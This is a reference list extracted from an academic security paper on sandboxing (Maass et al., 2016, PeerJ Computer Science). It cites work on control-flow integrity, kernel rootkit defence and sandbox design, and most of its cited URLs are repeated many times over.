http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dl.acm.org/citation.cfm?id=645954.675785 http://dx.doi.org/10.1016/j.cose.2012.09.007 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://dl.acm.org/citation.cfm?id=1929820.1929822 http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://blog.trendmicro.com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dl.acm.org/citation.cfm?id=1924943.1924945 http://dx.doi.org/10.1145/173668.168635 http://dx.doi.org/10.7717/peerj-cs.43 Wang Z, Jiang X, Cui W, Ning P. 2009. Countering kernel rootkits with lightweight hook protection. In: ACM conference on computer and communications security (CCS) (CCS ’09). New York: ACM, 545–554. Wartell R, Mohan V, Hamlen KW, Lin Z. 2012. Binary stirring: self-randomizing instruction addresses of legacy x86 binary code. In: ACM conference on computer and communications security (CCS) (CCS ’12). New York: ACM, 157–168. Weinstock CB, Lipson HF, Goodenough J. 2007. Arguing security: creating security assurance cases. Technical Report. Software Engineering Institute, Carnegie Mellon University. Williams D, Reynolds P, Walsh K, Sirer EG, Schneider FB. 2008. Device driver safety through a reference validation mechanism. In: USENIX symposium on operating systems design and implementation (OSDI) (OSDI’08). Berkeley: USENIX Association, 241–254. Available at http:/ /dl.acm.org/citation.cfm?id=1855741.1855758. Wurster G, Van Oorschot PC. 2010. A control point for reducing root abuse of file-system privileges. In: ACM conference on computer and communications security (CCS) (CCS ’10). New York: ACM, 224–236. Xu R, Saı̈di H, Anderson R. 2012. Aurasium: practical policy enforcement for android applications. In: USENIX security (Security’12). Berkeley: USENIX Association, 27–27. Available at http://dl.acm.org/citation.cfm?id=2362793.2362820. Yan Y, Menarini M, Griswold W. 2014. Mining software contracts for software evolution. In: International conference on software maintenance and evolution (ICSME). Washington, D.C.: IEEE, 471–475. Yee B, Sehr D, Dardyk G, Chen JB, Muth R, Ormandy T, Okasaka S, Narula N, Fullagar N. 2009. Native client: a sandbox for portable, untrusted x86 native code. In: IEEE symposium on security and privacy. Washington, DC: IEEE, 79–93. Zeldovich N, Boyd-Wickizer S, Kohler E, Mazieres D. 2006. Making information flow explicit in HiStar. In: USENIX symposium on operating systems design and implementation (OSDI) (OSDI ’06). Berkeley: USENIX Association, 263–278. Available at http://dl.acm.org/citation. cfm?id=1298455.1298481. Zeng B, Tan G, Erlingsson Ú. 2013. Strato: a retargetable framework for low-level inlined-reference monitors. In: USENIX security (SEC’13). Berkeley: USENIX Association, 369–382. Available at http://dl.acm.org/citation.cfm?id=2534766.2534798. Zeng B, Tan G, Morrisett G. 2011. Combining control-flow integrity and static analysis for efficient and validated data sandboxing. In: ACM conference on computer and communications security (CCS) (CCS ’11). New York: ACM, 29–40. Zhang F, Chen J, Chen H, Zang B. 2011. Cloudvisor: retrofitting protection of virtual machines in multi-tenant cloud with nested virtualization. In: ACM symposium on operating systems principles (SOSP) (SOSP ’11). New York: ACM, 203–216. Zhang M, Sekar R. 2013. Control flow integrity for COTS binaries. In: USENIX security (SEC’13). Berkeley: USENIX Association, 337–352. Available at http://dl.acm.org/citation.cfm?id=2534766. 2534796. Zhang C, Wei T, Chen Z, Duan L, Szekeres L, McCamant S, Song D, Zou W. 2013. Practical control flow integrity and randomization for binary executables. In: IEEE symposium on security and privacy. Washington, DC: IEEE Computer Society, 559–573. Zhong Q, Edwards N, Rees O. 1997. Operating system support for the sandbox method and its application on mobile code security. Technical Report HPL-97-153. HP Laboratories Bristol. Available at http://www.hpl.hp.com/techreports/97/HPL-97-153.pdf. Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 36/36 https://peerj.com/computer-science/ http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=1855741.1855758 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=2362793.2362820 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 http://dl.acm.org/citation.cfm?id=1298455.1298481 